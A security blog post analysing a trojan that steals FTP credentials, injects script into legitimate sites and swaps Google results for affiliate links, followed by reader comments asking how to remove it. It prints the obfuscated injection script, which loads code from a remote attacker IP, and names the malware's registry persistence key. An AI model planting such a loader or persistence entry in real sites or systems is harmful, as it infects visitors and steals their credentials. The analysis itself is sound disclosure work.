Malware Manipulating Google SERPs
Over the past few months, ScanSafe has been tracking malware that incorporates a couple of crafty Black Hat SEO techniques to manipulate Google SERPs. Because of the nature of how the attacks work, the rate of the attacks have been increasing exponentially and have now grown considerably large.
The attacks are perpetuated through compromise of legitimate sites. Once a visitor to a compromised site has been infected with the trojan, any sites that they manage will then also be susceptible to compromise. (One component of the malware is its ability to monitor traffic and steal FTP credentials). Though stolen FTP credentials appear to be the most common method employed in these particular attacks, compromise can also occur via standard methods, such as poor configuration settings, vulnerable Web apps, and so on.
The malicious script embedded during the compromise is usually placed on other .js or .php file rather than directly on the default home page for the site. For example, menu files, login pages, and similar types of content feeds are generally targed. This technique could enable the signs of the compromise to bypass casual observation. The embedded script is as follows:
document.write(unescape('%3CRhSsc5uriptUd%20sPQrCRc%3D5u%2F5u%2F9CR4sW%2E5u24R6M7GS%2EPQ2PQ%2E1Ud95%2FsWj5uqusWeUdrsWy%2EGSjs%3E%3CCR%2FsRhScR6Mript%3E').replace(/R6M|RhS|GS|5u|Ud|PQ|CR|sW/g,""));
This leads to 94.247.2.195 which resolves to hs.2-195.zlkon.lv, hosted by Datoru Express Serviss, Latvia. Of course, physical host location and whois information may bear little resemblance to the actual attackers.
When Web surfers visit one of these compromised sites, the embedded script leads to a cocktail of PDF, Flash, and MDAC exploits which result in the creation of an executable (typically named iexplorer.exe) and two batch files (C:\_.bat and C:\_.t). The batch files ensure the executable gets moved and renamed. The malware's final filename and location are random, examples include:
%windir%\flvc.ebi
%windir%\bpagokx.nmy
%windir%\system32\oka.cdq
The file is loaded by registering it as an auxiliary sound driver:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
"aux"="<path and filename of trojan>"
This causes the malware to load when any sound-enabled application, i.e. any browser, is launched. The malware monitors traffic to and from the browser (and thus enables the malware to steal usernames and passwords and other sensitive information). When infected users perform certain Google searches, the search engine results page (SERP) is manipulated so that affiliate links are replacing the legitimate links. Cookie stuffing is used so that the links presented appear normal, i.e. the affiliate ID is not exposed, but the rogue affiliate gets full credit for the unintended click through.
Given the escalation of these attacks, it appears that someone is making a great deal of money.
Mary Landesman
Reader Comments (5)
its already blocked regedit from run! so how to?
What is the best way to get rid of it ?
I am trying to find more information about this attack. Some of my customers have been affected. Which virus software can detect it? What is the name of this virus? What is a good removal tool?
So I take it no one has a viable solution to these f@cktards and this PITA exploit? I've been dealing with it for weeks and cannot seem to thwart their attempts, even though I have changed FTP passcodes, login passcodes and set the files back to their originals. I also work from a Macintosh, so I know its not my local system that;s been compromised.
Thanks.
They are variants of Daonol:
http://www.sophos.com/security/analyses/viruses-and-spyware/trojdaonolfam.html
http://www.sophos.com/security/analyses/viruses-and-spyware/trojdaonolc.html